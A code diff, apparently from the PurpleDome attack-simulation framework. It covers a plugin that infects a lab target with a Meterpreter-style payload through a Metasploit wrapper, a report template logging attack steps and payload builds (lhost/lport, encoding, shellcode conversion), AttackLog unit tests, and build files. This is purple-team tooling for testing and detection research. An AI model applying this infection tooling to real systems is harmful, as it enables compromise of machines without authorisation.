payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target, payload_type, payload_name, )
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
si = metasploit.sysinfo(target)
si = self.metasploit.sysinfo(target)
print(f"Sysinfo: {si}")
return res

@ -31,7 +31,7 @@ class VagrantPlugin(SSHFeatures, MachineryPlugin):
self.connection = None
self.vagrantfilepath = None
self.vagrantfile = None
self.sysconf = {}
# self.sysconf = {}
def process_config(self, config):
""" Machine specific processing of configuration """

@ -18,4 +18,5 @@ pylint
mypy
types-PyYAML
types-requests
types-simplejson
types-simplejson
types-paramiko

@ -143,6 +143,11 @@ Vagrant.configure("2") do |config|
target3.vm.synced_folder ".", "/vagrant"
target3.vm.provider "virtualbox" do |v|
v.memory = 2048
v.cpus = 4
end
# Disable automatic box update checking. If you disable this, then
# boxes will only be checked for updates when the user runs

@ -1,120 +1,207 @@
Attack
======
Target systems
--------------
Boilerplate
-----------
PurpleDome, attack-log version: {{ boilerplate.log_format_major_version }}.{{ boilerplate.log_format_minor_version }}
Systems
-------
{% for s in systems %}
{{ s.role }}:{{ s.name }}
~~~~~~~~~~~~
IP: {{ s.ip }}
OS: {{ s.os }}
Paw: {{ s.paw }}
Group: {{ s.group }}
Sensors:
{% for sensor in s.sensors %}
* {{ sensor }}
{% endfor %} {# sensors #}
Vulnerabilities:
{% for vulnerability in s.vulnerabilities %}
* {{ vulnerability }}
{% endfor %} {# vulnerabilities #}
{% endfor %} {# systems #}
Attack steps
------------
{% for e in events %}
{% if e.event is eq("start") %}
{% if e.type is eq("dropping_file") %}
Dropping file to target
~~~~~~~~~~~~~~~~~~~~~~~
At {{ e.timestamp }}
The file {{ e.file_name }} is dropped to the target {{ e.target }}.
{% endif %}
{% if e.type is eq("execute_payload") %}
Executing payload on target
~~~~~~~~~~~~~~~~~~~~~~~~~~~
At {{ e.timestamp }}
The command {{ e.command }} is used to start a file on the target {{ e.target }}.
{% endif %}
{% if e.type is eq("narration") %}
{{ e.text }}
{% endif %}
{% if e.sub_type is eq("metasploit") %}
Metasploit attack {{ e.name }}
~~~~~~~~~~~~~~~~~~~~~~~~~~
Tactics: {{ e.tactics }}
Tactics ID: {{ e.tactics_id }}
Hunting Tag: {{ e.hunting_tag}}
At {{ e.timestamp }} a Metasploit command {{ e.name }} was used to attack {{ e.target }} from {{ e.source }}.
{{ e.description }}
{% if e.metasploit_command is string() %}
Metasploit command: {{ e.metasploit_command }}
{% endif %}
{% if e.situation_description is string() %}
Situation: {{ e.situation_description }}
{% endif %}
{% if e.countermeasure is string() %}
Countermeasure: {{ e.countermeasure }}
{% endif %}
{% endif %}
{% if e.sub_type is eq("kali") %}
Kali attack {{ e.name }}
~~~~~~~~~~~~~~~~~~~~~~~~~~
Tactics: {{ e.tactics }}
Tactics ID: {{ e.tactics_id }}
Hunting Tag: {{ e.hunting_tag}}
At {{ e.timestamp }} a Kali command {{ e.kali_name }} was used to attack {{ e.target }} from {{ e.source }}.
{{ e.description }}
{% if e.kali_command is string() %}
Kali command: {{ e.kali_command }}
{% endif %}
{% if e.situation_description is string() %}
Situation: {{ e.situation_description }}
{% endif %}
{% if e.countermeasure is string() %}
Countermeasure: {{ e.countermeasure }}
{% endif %}
{% endif %}
{% if e.sub_type is eq("caldera") %}
Caldera attack {{ e.name }}
~~~~~~~~~~~~~~~~~~~~~~~~~~
Tactics: {{ e.tactics }}
Tactics ID: {{ e.tactics_id }}
Hunting Tag: {{ e.hunting_tag}}
At {{ e.timestamp }} a Caldera ability {{ e.ability_id }}/"{{ e.name }}" was used to attack the group {{ e.target_group }} from {{ e.source }}.
{{ e.description }}
{% if e.situation_description is string() %}
Situation: {{ e.situation_description }}
{% endif %}
{% if e.countermeasure is string() %}
Countermeasure: {{ e.countermeasure }}
{% endif %}
{% endif %}
{% endif %} {# event equal start #}
{% if e.event is eq("start") %}
{% if e.type is eq("attack_step") %}
{{ e.text }}
~~~~~~~~~~~~
{% endif %} {# end attack_step #}
{% if e.type is eq("dropping_file") %}
Dropping file to target
~~~~~~~~~~~~~~~~~~~~~~~
At {{ e.timestamp }}
The file {{ e.file_name }} is dropped to the target {{ e.target }}.
{% endif %}
{% if e.type is eq("execute_payload") %}
Executing payload on target
~~~~~~~~~~~~~~~~~~~~~~~~~~~
At {{ e.timestamp }}
The command {{ e.command }} is used to start a file on the target {{ e.target }}.
{% endif %}
{% if e.type is eq("narration") %}
{{ e.text }}
{% endif %}
{% if e.sub_type is eq("metasploit") %}
Metasploit attack {{ e.name }}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Tactics: {{ e.tactics }}
+ Tactics ID: {{ e.tactics_id }}
+ Hunting Tag: {{ e.hunting_tag}}
+ At {{ e.timestamp }} a Metasploit command {{ e.name }} was used to attack {{ e.target }} from {{ e.source }}.
+ Description: {{ e.description }}
{% if e.metasploit_command is string() %}
+ Metasploit command: {{ e.metasploit_command }}
{% endif %}
{% if e.situation_description is string() %}
+ Situation: {{ e.situation_description }}
{% endif %}
{% if e.countermeasure is string() %}
+ Countermeasure: {{ e.countermeasure }}
{% endif %}
{% if e.result is string() %}
Attack result::
{{ e.result }}
{% endif %}
{% if e.result is iterable() %}
Attack result::
{% for item in e.result %}
{{ item|trim()|indent(4) }}
{% endfor %}
{% endif %}
{% endif %}
{% if e.sub_type is eq("kali") %}
Kali attack {{ e.name }}
~~~~~~~~~~~~~~~~~~~~~~~~
+ Tactics: {{ e.tactics }}
+ Tactics ID: {{ e.tactics_id }}
+ Hunting Tag: {{ e.hunting_tag}}
+ At {{ e.timestamp }} a Kali command {{ e.kali_name }} was used to attack {{ e.target }} from {{ e.source }}.
+ Description: {{ e.description }}
{% if e.kali_command is string() %}
+ Kali command: {{ e.kali_command }}
{% endif %}
{% if e.situation_description is string() %}
+ Situation: {{ e.situation_description }}
{% endif %}
{% if e.countermeasure is string() %}
+ Countermeasure: {{ e.countermeasure }}
{% endif %}
{% if e.result is string() %}
Attack result::
{{ e.result }}
{% endif %}
{% if e.result is iterable() %}
Attack result::
{% for item in e.result %}
{{ item|trim()|indent(4) }}
{% endfor %}
{% endif %}
{% endif %}
{% if e.sub_type is eq("caldera") %}
Caldera attack {{ e.name }}
~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Tactics: {{ e.tactics }}
+ Tactics ID: {{ e.tactics_id }}
+ Hunting Tag: {{ e.hunting_tag}}
+ At {{ e.timestamp }} a Caldera ability {{ e.ability_id }}/"{{ e.name }}" was used to attack the group {{ e.target_group }} from {{ e.source }}.
+ Description: {{ e.description }}
{% if e.situation_description is string() %}
+ Situation: {{ e.situation_description }}
{% endif %}
{% if e.countermeasure is string() %}
+ Countermeasure: {{ e.countermeasure }}
{% endif %}
{% if e.result is string() %}
Attack result::
{{ e.result }}
{% endif %}
{% if e.result is iterable() %}
Attack result::
{% for item in e.result %}
{{ item|trim()|indent(4) }}
{% endfor %}
{% endif %}
{% endif %}
{% endif %} {# event equal start #}
{% endfor %}
Tools
-----
{% for e in events %}
{% if e.event is eq("start") %}
{% if e.type is eq("build") %}
Building tool {{ e.filename }}
~~~~~~~~~~~~~~~~~~~~~~~
The file {{ e.filename }} is built
{% if e.for_step %}
It will be used in Step {{ e.for_step }}
{% endif %}
Build time is between {{ e.timestamp }} and {{ e.timestamp_end }}
{% if e.dl_uri is string() %}
Built from source downloaded from {{ e.dl_uri }}
{% endif %}
{% if e.dl_uris %}
Built from sources downloaded from
{% for i in e.dl_uris %}
* {{ i }}
{% endfor %}
{% endif %}
{% if e.payload is string() %}
The attack tool uses a Meterpreter payload. The payload is {{ e.payload }}. The payload is built for the {{ e.platform }} platform and the {{ e.architecture }} architecture.
The settings for lhost and lport are {{ e.lhost }}/{{ e.lport }}.
{% endif %}
{% if e.encoding is string() %}
The file was encoded using {{ e.encoding }} after compilation.
{% endif %}
{% if e.encoded_filename is string() %}
The encoded version is named {{ e.encoded_filename }}.
{% endif %}
{% if e.SRDI_conversion %}
The attack tool was converted to position independent shellcode. See: https://github.com/monoxgas/sRDI
{% endif %}
{{ e.comment }}
{% endif %}
{% endif %}
{% if e.event is eq("start") %}
{% if e.type is eq("build") %}
Building tool {{ e.filename }}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The file {{ e.filename }} is built
{% if e.for_step %}
It will be used in Step {{ e.for_step }}
{% endif %}
Build time is between {{ e.timestamp }} and {{ e.timestamp_end }}
{% if e.dl_uri is string() %}
Built from source downloaded from {{ e.dl_uri }}
{% endif %}
{% if e.dl_uris %}
Built from sources downloaded from
{% for i in e.dl_uris %}
* {{ i }}
{% endfor %}
{% endif %}
{% if e.payload is string() %}
The attack tool uses a Meterpreter payload. The payload is {{ e.payload }}. The payload is built for the {{ e.platform }} platform and the {{ e.architecture }} architecture.
The settings for lhost and lport are {{ e.lhost }}/{{ e.lport }}.
{% endif %}
{% if e.encoding is string() %}
The file was encoded using {{ e.encoding }} after compilation.
{% endif %}
{% if e.encoded_filename is string() %}
The encoded version is named {{ e.encoded_filename }}.
{% endif %}
{% if e.SRDI_conversion %}
The attack tool was converted to position independent shellcode. See: https://github.com/monoxgas/sRDI
{% endif %}
{{ e.comment }}
{% endif %}
{% endif %}
{% endfor %}

@ -18,7 +18,11 @@ class TestMachineConfig(unittest.TestCase):
""" The init is empty """
al = AttackLog()
self.assertIsNotNone(al)
self.assertEqual(al.get_dict(), [])
default = {"boilerplate": {'log_format_major_version': 1, 'log_format_minor_version': 1},
"system_overview": [],
"attack_log": []}
self.assertEqual(al.get_dict(), default)
def test_caldera_attack_start(self):
""" Starting a caldera attack """
@ -39,16 +43,16 @@ class TestMachineConfig(unittest.TestCase):
description=description
)
data = al.get_dict()
self.assertEqual(data[0]["event"], "start")
self.assertEqual(data[0]["type"], "attack")
self.assertEqual(data[0]["sub_type"], "caldera")
self.assertEqual(data[0]["source"], source)
self.assertEqual(data[0]["target_paw"], paw)
self.assertEqual(data[0]["target_group"], group)
self.assertEqual(data[0]["ability_id"], ability_id)
self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp)
self.assertEqual(data[0]["name"], name)
self.assertEqual(data[0]["description"], description)
self.assertEqual(data["attack_log"][0]["event"], "start")
self.assertEqual(data["attack_log"][0]["type"], "attack")
self.assertEqual(data["attack_log"][0]["sub_type"], "caldera")
self.assertEqual(data["attack_log"][0]["source"], source)
self.assertEqual(data["attack_log"][0]["target_paw"], paw)
self.assertEqual(data["attack_log"][0]["target_group"], group)
self.assertEqual(data["attack_log"][0]["ability_id"], ability_id)
self.assertEqual(data["attack_log"][0]["hunting_tag"], "MITRE_" + ttp)
self.assertEqual(data["attack_log"][0]["name"], name)
self.assertEqual(data["attack_log"][0]["description"], description)
def test_caldera_attack_stop(self):
""" Stopping a caldera attack """
@ -69,16 +73,16 @@ class TestMachineConfig(unittest.TestCase):
description=description
)
data = al.get_dict()
self.assertEqual(data[0]["event"], "stop")
self.assertEqual(data[0]["type"], "attack")
self.assertEqual(data[0]["sub_type"], "caldera")
self.assertEqual(data[0]["source"], source)
self.assertEqual(data[0]["target_paw"], paw)
self.assertEqual(data[0]["target_group"], group)
self.assertEqual(data[0]["ability_id"], ability_id)
self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp)
self.assertEqual(data[0]["name"], name)
self.assertEqual(data[0]["description"], description)
self.assertEqual(data["attack_log"][0]["event"], "stop")
self.assertEqual(data["attack_log"][0]["type"], "attack")
self.assertEqual(data["attack_log"][0]["sub_type"], "caldera")
self.assertEqual(data["attack_log"][0]["source"], source)
self.assertEqual(data["attack_log"][0]["target_paw"], paw)
self.assertEqual(data["attack_log"][0]["target_group"], group)
self.assertEqual(data["attack_log"][0]["ability_id"], ability_id)
self.assertEqual(data["attack_log"][0]["hunting_tag"], "MITRE_" + ttp)
self.assertEqual(data["attack_log"][0]["name"], name)
self.assertEqual(data["attack_log"][0]["description"], description)
def test_kali_attack_start(self):
""" Starting a kali attack """
@ -93,13 +97,13 @@ class TestMachineConfig(unittest.TestCase):
ttp=ttp,
)
data = al.get_dict()
self.assertEqual(data[0]["event"], "start")
self.assertEqual(data[0]["type"], "attack")
self.assertEqual(data[0]["sub_type"], "kali")
self.assertEqual(data[0]["source"], source)
self.assertEqual(data[0]["target"], target)
self.assertEqual(data[0]["kali_name"], attack_name)
self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp)
self.assertEqual(data["attack_log"][0]["event"], "start")
self.assertEqual(data["attack_log"][0]["type"], "attack")
self.assertEqual(data["attack_log"][0]["sub_type"], "kali")
self.assertEqual(data["attack_log"][0]["source"], source)
self.assertEqual(data["attack_log"][0]["target"], target)
self.assertEqual(data["attack_log"][0]["kali_name"], attack_name)
self.assertEqual(data["attack_log"][0]["hunting_tag"], "MITRE_" + ttp)
def test_kali_attack_stop(self):
""" Stopping a kali attack """
@ -114,13 +118,107 @@ class TestMachineConfig(unittest.TestCase):
ttp=ttp,
)
data = al.get_dict()
self.assertEqual(data[0]["event"], "stop")
self.assertEqual(data[0]["type"], "attack")
self.assertEqual(data[0]["sub_type"], "kali")
self.assertEqual(data[0]["source"], source)
self.assertEqual(data[0]["target"], target)
self.assertEqual(data[0]["kali_name"], attack_name)
self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp)
self.assertEqual(data["attack_log"][0]["event"], "stop")
self.assertEqual(data["attack_log"][0]["type"], "attack")
self.assertEqual(data["attack_log"][0]["sub_type"], "kali")
self.assertEqual(data["attack_log"][0]["source"], source)
self.assertEqual(data["attack_log"][0]["target"], target)
self.assertEqual(data["attack_log"][0]["kali_name"], attack_name)
self.assertEqual(data["attack_log"][0]["hunting_tag"], "MITRE_" + ttp)
def test_narration_start(self):
""" Starting a narration """
al = AttackLog()
text = "texttextext"
al.start_narration(text
)
data = al.get_dict()
self.assertEqual(data["attack_log"][0]["event"], "start")
self.assertEqual(data["attack_log"][0]["type"], "narration")
self.assertEqual(data["attack_log"][0]["sub_type"], "user defined narration")
self.assertEqual(data["attack_log"][0]["text"], text)
def test_build_start(self):
""" Starting a build """
al = AttackLog()
dl_uri = "asource"
dl_uris = "a target"
payload = "1234"
platform = "a name"
architecture = "arch"
lhost = "lhost"
lport = 8080
filename = "afilename"
encoding = "encoded"
encoded_filename = "ef"
sRDI_conversion = True
for_step = 4
comment = "this is a comment"
al.start_build(dl_uri=dl_uri,
dl_uris=dl_uris,
payload=payload,
platform=platform,
architecture=architecture,
lhost=lhost,
lport=lport,
filename=filename,
encoding=encoding,
encoded_filename=encoded_filename,
sRDI_conversion=sRDI_conversion,
for_step=for_step,
comment=comment
)
data = al.get_dict()
self.assertEqual(data["attack_log"][0]["event"], "start")
self.assertEqual(data["attack_log"][0]["type"], "build")
self.assertEqual(data["attack_log"][0]["dl_uri"], dl_uri)
self.assertEqual(data["attack_log"][0]["dl_uris"], dl_uris)
self.assertEqual(data["attack_log"][0]["payload"], payload)
self.assertEqual(data["attack_log"][0]["platform"], platform)
self.assertEqual(data["attack_log"][0]["architecture"], architecture)
self.assertEqual(data["attack_log"][0]["lhost"], lhost)
self.assertEqual(data["attack_log"][0]["lport"], lport)
self.assertEqual(data["attack_log"][0]["filename"], filename)
self.assertEqual(data["attack_log"][0]["encoding"], encoding)
self.assertEqual(data["attack_log"][0]["encoded_filename"], encoded_filename)
self.assertEqual(data["attack_log"][0]["sRDI_conversion"], sRDI_conversion)
self.assertEqual(data["attack_log"][0]["for_step"], for_step)
self.assertEqual(data["attack_log"][0]["comment"], comment)
def test_build_start_default(self):
""" Starting a build default values"""
al = AttackLog()
al.start_build()
data = al.get_dict()
self.assertEqual(data["attack_log"][0]["event"], "start")
self.assertEqual(data["attack_log"][0]["type"], "build")
self.assertEqual(data["attack_log"][0]["dl_uri"], None)
self.assertEqual(data["attack_log"][0]["dl_uris"], None)
self.assertEqual(data["attack_log"][0]["payload"], None)
self.assertEqual(data["attack_log"][0]["platform"], None)
self.assertEqual(data["attack_log"][0]["architecture"], None)
self.assertEqual(data["attack_log"][0]["lhost"], None)
self.assertEqual(data["attack_log"][0]["lport"], None)
self.assertEqual(data["attack_log"][0]["filename"], None)
self.assertEqual(data["attack_log"][0]["encoding"], None)
self.assertEqual(data["attack_log"][0]["encoded_filename"], None)
self.assertEqual(data["attack_log"][0]["sRDI_conversion"], False)
self.assertEqual(data["attack_log"][0]["for_step"], None)
self.assertEqual(data["attack_log"][0]["comment"], None)
def test_build_stop(self):
""" Stopping a build """
al = AttackLog()
logid = "lid"
al.stop_build(logid=logid)
data = al.get_dict()
self.assertEqual(data["attack_log"][0]["event"], "stop")
self.assertEqual(data["attack_log"][0]["type"], "build")
self.assertEqual(data["attack_log"][0]["logid"], logid)
def test_metasploit_attack_start(self):
""" Starting a metasploit attack """
@ -135,13 +233,13 @@ class TestMachineConfig(unittest.TestCase):
ttp=ttp,
)
data = al.get_dict()
self.assertEqual(data[0]["event"], "start")
self.assertEqual(data[0]["type"], "attack")
self.assertEqual(data[0]["sub_type"], "metasploit")
self.assertEqual(data[0]["source"], source)
self.assertEqual(data[0]["target"], target)
self.assertEqual(data[0]["metasploit_command"], attack_name)
self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp)
self.assertEqual(data["attack_log"][0]["event"], "start")
self.assertEqual(data["attack_log"][0]["type"], "attack")
self.assertEqual(data["attack_log"][0]["sub_type"], "metasploit")
self.assertEqual(data["attack_log"][0]["source"], source)
self.assertEqual(data["attack_log"][0]["target"], target)
self.assertEqual(data["attack_log"][0]["metasploit_command"], attack_name)
self.assertEqual(data["attack_log"][0]["hunting_tag"], "MITRE_" + ttp)
def test_metasploit_attack_stop(self):
""" Stopping a metasploit attack """
@ -156,13 +254,13 @@ class TestMachineConfig(unittest.TestCase):
ttp=ttp,
)
data = al.get_dict()
self.assertEqual(data[0]["event"], "stop")
self.assertEqual(data[0]["type"], "attack")
self.assertEqual(data[0]["sub_type"], "metasploit")
self.assertEqual(data[0]["source"], source)
self.assertEqual(data[0]["target"], target)
self.assertEqual(data[0]["metasploit_command"], attack_name)
self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp)
self.assertEqual(data["attack_log"][0]["event"], "stop")
self.assertEqual(data["attack_log"][0]["type"], "attack")
self.assertEqual(data["attack_log"][0]["sub_type"], "metasploit")
self.assertEqual(data["attack_log"][0]["source"], source)
self.assertEqual(data["attack_log"][0]["target"], target)
self.assertEqual(data["attack_log"][0]["metasploit_command"], attack_name)
self.assertEqual(data["attack_log"][0]["hunting_tag"], "MITRE_" + ttp)
def test_attack_plugin_start(self):
""" Starting a attack plugin """
@ -177,13 +275,13 @@ class TestMachineConfig(unittest.TestCase):
ttp=ttp,
)
data = al.get_dict()
self.assertEqual(data[0]["event"], "start")
self.assertEqual(data[0]["type"], "attack")
self.assertEqual(data[0]["sub_type"], "attack_plugin")
self.assertEqual(data[0]["source"], source)
self.assertEqual(data[0]["target"], target)
self.assertEqual(data[0]["plugin_name"], attack_name)
self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp)
self.assertEqual(data["attack_log"][0]["event"], "start")
self.assertEqual(data["attack_log"][0]["type"], "attack")
self.assertEqual(data["attack_log"][0]["sub_type"], "attack_plugin")
self.assertEqual(data["attack_log"][0]["source"], source)
self.assertEqual(data["attack_log"][0]["target"], target)
self.assertEqual(data["attack_log"][0]["plugin_name"], attack_name)
self.assertEqual(data["attack_log"][0]["hunting_tag"], "MITRE_" + ttp)
def test_attack_plugin_stop(self):
""" Stopping a attack plugin"""
@ -198,13 +296,13 @@ class TestMachineConfig(unittest.TestCase):
ttp=ttp,
)
data = al.get_dict()
self.assertEqual(data[0]["event"], "stop")
self.assertEqual(data[0]["type"], "attack")
self.assertEqual(data[0]["sub_type"], "attack_plugin")
self.assertEqual(data[0]["source"], source)
self.assertEqual(data[0]["target"], target)
self.assertEqual(data[0]["plugin_name"], attack_name)
self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp)
self.assertEqual(data["attack_log"][0]["event"], "stop")
self.assertEqual(data["attack_log"][0]["type"], "attack")
self.assertEqual(data["attack_log"][0]["sub_type"], "attack_plugin")
self.assertEqual(data["attack_log"][0]["source"], source)
self.assertEqual(data["attack_log"][0]["target"], target)
self.assertEqual(data["attack_log"][0]["plugin_name"], attack_name)
self.assertEqual(data["attack_log"][0]["hunting_tag"], "MITRE_" + ttp)
def test_file_write_start(self):
""" Starting a file write """
@ -217,12 +315,12 @@ class TestMachineConfig(unittest.TestCase):
file_name=file_name,
)
data = al.get_dict()
self.assertEqual(data[0]["event"], "start")
self.assertEqual(data[0]["type"], "dropping_file")
self.assertEqual(data[0]["sub_type"], "by PurpleDome")
self.assertEqual(data[0]["source"], source)
self.assertEqual(data[0]["target"], target)
self.assertEqual(data[0]["file_name"], file_name)
self.assertEqual(data["attack_log"][0]["event"], "start")
self.assertEqual(data["attack_log"][0]["type"], "dropping_file")
self.assertEqual(data["attack_log"][0]["sub_type"], "by PurpleDome")
self.assertEqual(data["attack_log"][0]["source"], source)
self.assertEqual(data["attack_log"][0]["target"], target)
self.assertEqual(data["attack_log"][0]["file_name"], file_name)
def test_file_write_stop(self):
""" Stopping a file write """
@ -235,12 +333,12 @@ class TestMachineConfig(unittest.TestCase):
file_name=file_name,
)
data = al.get_dict()
self.assertEqual(data[0]["event"], "stop")
self.assertEqual(data[0]["type"], "dropping_file")
self.assertEqual(data[0]["sub_type"], "by PurpleDome")
self.assertEqual(data[0]["source"], source)
self.assertEqual(data[0]["target"], target)
self.assertEqual(data[0]["file_name"], file_name)
self.assertEqual(data["attack_log"][0]["event"], "stop")
self.assertEqual(data["attack_log"][0]["type"], "dropping_file")
self.assertEqual(data["attack_log"][0]["sub_type"], "by PurpleDome")
self.assertEqual(data["attack_log"][0]["source"], source)
self.assertEqual(data["attack_log"][0]["target"], target)
self.assertEqual(data["attack_log"][0]["file_name"], file_name)
def test_execute_payload_start(self):
""" Starting a execute payload """
@ -253,12 +351,12 @@ class TestMachineConfig(unittest.TestCase):
command=command,
)
data = al.get_dict()
self.assertEqual(data[0]["event"], "start")
self.assertEqual(data[0]["type"], "execute_payload")
self.assertEqual(data[0]["sub_type"], "by PurpleDome")
self.assertEqual(data[0]["source"], source)
self.assertEqual(data[0]["target"], target)
self.assertEqual(data[0]["command"], command)
self.assertEqual(data["attack_log"][0]["event"], "start")
self.assertEqual(data["attack_log"][0]["type"], "execute_payload")
self.assertEqual(data["attack_log"][0]["sub_type"], "by PurpleDome")
self.assertEqual(data["attack_log"][0]["source"], source)
self.assertEqual(data["attack_log"][0]["target"], target)
self.assertEqual(data["attack_log"][0]["command"], command)
def test_execute_payload_stop(self):
""" Stopping a execute payload """
@ -271,12 +369,12 @@ class TestMachineConfig(unittest.TestCase):
command=command,
)
data = al.get_dict()
self.assertEqual(data[0]["event"], "stop")
self.assertEqual(data[0]["type"], "execute_payload")
self.assertEqual(data[0]["sub_type"], "by PurpleDome")
self.assertEqual(data[0]["source"], source)
self.assertEqual(data[0]["target"], target)
self.assertEqual(data[0]["command"], command)
self.assertEqual(data["attack_log"][0]["event"], "stop")
self.assertEqual(data["attack_log"][0]["type"], "execute_payload")
self.assertEqual(data["attack_log"][0]["sub_type"], "by PurpleDome")
self.assertEqual(data["attack_log"][0]["source"], source)
self.assertEqual(data["attack_log"][0]["target"], target)
self.assertEqual(data["attack_log"][0]["command"], command)
def test_mitre_fix_ttp_is_none(self):
""" Testing the mitre ttp fix for ttp being none """
@ -285,3 +383,64 @@ class TestMachineConfig(unittest.TestCase):
def test_mitre_fix_ttp_is_MITRE_SOMETHING(self):
""" Testing the mitre ttp fix for ttp being MITRE_ """
self.assertEqual(app.attack_log.__mitre_fix_ttp__("MITRE_FOO"), "MITRE_FOO")
# tests for a bunch of default data covering caldera attacks. That way we will have some fallback if no data is submitted:
def test_get_caldera_default_name_missing(self):
""" Testing getting the caldera default name """
al = AttackLog()
self.assertEqual(al.get_caldera_default_name("missing"), None)
def test_get_caldera_default_name(self):
""" Testing getting the caldera default name """
al = AttackLog()
self.assertEqual(al.get_caldera_default_name("bd527b63-9f9e-46e0-9816-b8434d2b8989"), "whoami")
def test_get_caldera_default_description_missing(self):
""" Testing getting the caldera default description """
al = AttackLog()
self.assertEqual(al.get_caldera_default_description("missing"), None)
def test_get_caldera_default_description(self):
""" Testing getting the caldera default description """
al = AttackLog()
self.assertEqual(al.get_caldera_default_description("bd527b63-9f9e-46e0-9816-b8434d2b8989"), "Obtain user from current session")
def test_get_caldera_default_tactics_missing(self):
""" Testing getting the caldera default tactics """
al = AttackLog()
self.assertEqual(al.get_caldera_default_tactics("missing"), None)
def test_get_caldera_default_tactics(self):
""" Testing getting the caldera default tactics """
al = AttackLog()
self.assertEqual(al.get_caldera_default_tactics("bd527b63-9f9e-46e0-9816-b8434d2b8989"), "System Owner/User Discovery")
def test_get_caldera_default_tactics_id_missing(self):
""" Testing getting the caldera default tactics_id """
al = AttackLog()
self.assertEqual(al.get_caldera_default_tactics_id("missing"), None)
def test_get_caldera_default_tactics_id(self):
""" Testing getting the caldera default tactics_id """
al = AttackLog()
self.assertEqual(al.get_caldera_default_tactics_id("bd527b63-9f9e-46e0-9816-b8434d2b8989"), "T1033")
def test_get_caldera_default_situation_description_missing(self):
""" Testing getting the caldera default situation_description """
al = AttackLog()
self.assertEqual(al.get_caldera_default_situation_description("missing"), None)
def test_get_caldera_default_situation_description(self):
""" Testing getting the caldera default situation_description """
al = AttackLog()
self.assertEqual(al.get_caldera_default_situation_description("bd527b63-9f9e-46e0-9816-b8434d2b8989"), None)
def test_get_caldera_default_countermeasure_missing(self):
""" Testing getting the caldera default countermeasure """
al = AttackLog()
self.assertEqual(al.get_caldera_default_countermeasure("missing"), None)
def test_get_caldera_default_countermeasure(self):
""" Testing getting the caldera default countermeasure """
al = AttackLog()
self.assertEqual(al.get_caldera_default_countermeasure("bd527b63-9f9e-46e0-9816-b8434d2b8989"), None)

@ -0,0 +1,23 @@
# Minimal makefile for Sphinx documentation
#
# You can set these variables from the command line, and also
# from the environment for the first two.
SPHINXOPTS ?=
SPHINXBUILD ?= python3 -m sphinx
SOURCEDIR = source
BUILDDIR = build
# Put it first so that "make" without argument is like "make help".
help:
@$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
.PHONY: help Makefile all
# Catch-all target: route all unknown targets to Sphinx using the new
# "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS).
%: Makefile
@$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
all: html epub latexpdf text man

@ -13,6 +13,7 @@
# import os
# import sys
master_doc = 'contents'
# -- Project information -----------------------------------------------------

@ -64,7 +64,11 @@ globs = ["TODO.md",
"pylint.rc",
"shipit_log.txt",
"all_caldera_attacks_unique.txt",
"caldera_subset.txt"]
"caldera_subset.txt",
"templates/*.rst",
"tools/human_readable_documentation/source/conf.py",
"tools/human_readable_documentation/Makefile",
]
try:
os.remove(filename)

Loading…
Cancel
Save